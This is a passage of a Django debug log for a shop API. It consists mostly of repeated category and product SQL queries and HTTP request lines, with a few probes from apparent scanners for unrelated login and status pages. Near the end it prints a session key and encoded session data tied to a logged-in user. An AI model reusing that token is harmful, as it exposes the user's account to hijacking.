140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:48:05,428 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:48:05,431 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:48:05,433 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:48:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:48:11,696 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:48:11,705 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:48:11,709 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:48:11,711 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:48:11,720 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:48:11,724 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:48:11,727 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-16 07:48:11,732 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:48:11,736 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:48:11,739 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:48:11,744 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [16/Dec/2019 07:48:11] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-16 07:48:11,749 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:48:11,752 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:48:11,756 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:48:11,760 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:48:11,764 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:48:11,768 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:48:11,771 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:48:11,775 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:48:11,778 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:48:11,781 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:48:11,786 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:48:11,788 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:48:11,792 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:48:11,795 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:48:11,799 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:48:11,802 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:48:11,808 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:48:11,812 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:48:11,816 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:48:11,819 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:48:11,823 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:48:11,828 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:48:11,830 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:48:11,833 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:48:11,836 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:48:11,838 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:48:11,843 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:48:11,845 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:48:11,847 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:48:11,850 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:48:11,852 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:48:11,854 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:48:11,857 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:48:11,860 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:48:11,862 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:48:11,865 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:48:11,867 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:48:11] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:50:25] "GET / HTTP/1.0" 302 0 [16/Dec/2019 07:55:28] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:05:03] "GET / HTTP/1.0" 302 0 Not Found: /VSR3/Forms/Login/Login.aspx [16/Dec/2019 08:12:14] "GET /VSR3/Forms/Login/Login.aspx HTTP/1.0" 404 6674 [16/Dec/2019 08:12:56] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 08:17:58] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:23:01] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:28:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:33:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:38:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:43:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:48:14] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:57:44] "GET / HTTP/1.0" 302 0 [16/Dec/2019 08:58:04] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:12:35] "OPTIONS /api/v1/fire HTTP/1.0" 301 0 [16/Dec/2019 09:12:50] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 DEBUG 2019-12-16 09:13:18,788 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 09:13:18,793 utils 20136 140506422044416 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) DEBUG 2019-12-16 09:13:18,808 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 09:13:18,812 utils 20136 140506422044416 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T09:13:18.809937+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 9, 13, 18, 809937, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 09:13:18,842 utils 20136 140506422044416 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T09:13:18.839487+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 9, 13, 18, 839487, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 09:13:18] "GET /api/v1/fire/ HTTP/1.0" 200 6618 [16/Dec/2019 09:13:19] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [16/Dec/2019 09:13:19] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [16/Dec/2019 09:13:19] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [16/Dec/2019 09:13:19] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [16/Dec/2019 09:13:19] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [16/Dec/2019 09:13:19] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [16/Dec/2019 09:13:19] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [16/Dec/2019 09:13:19] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [16/Dec/2019 09:13:19] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [16/Dec/2019 09:13:19] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [16/Dec/2019 09:13:20] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 [16/Dec/2019 09:16:41] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 09:16:52] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 09:17:31] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:18:43] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 09:18:58] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 09:19:36] "OPTIONS /api/v1/fire HTTP/1.0" 301 0 [16/Dec/2019 09:19:51] "OPTIONS /api/v1/fire HTTP/1.0" 301 0 Not Found: /external.php [16/Dec/2019 09:20:06] "GET /external.php HTTP/1.0" 404 6629 [16/Dec/2019 09:22:33] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:27:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 09:27:40,392 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", 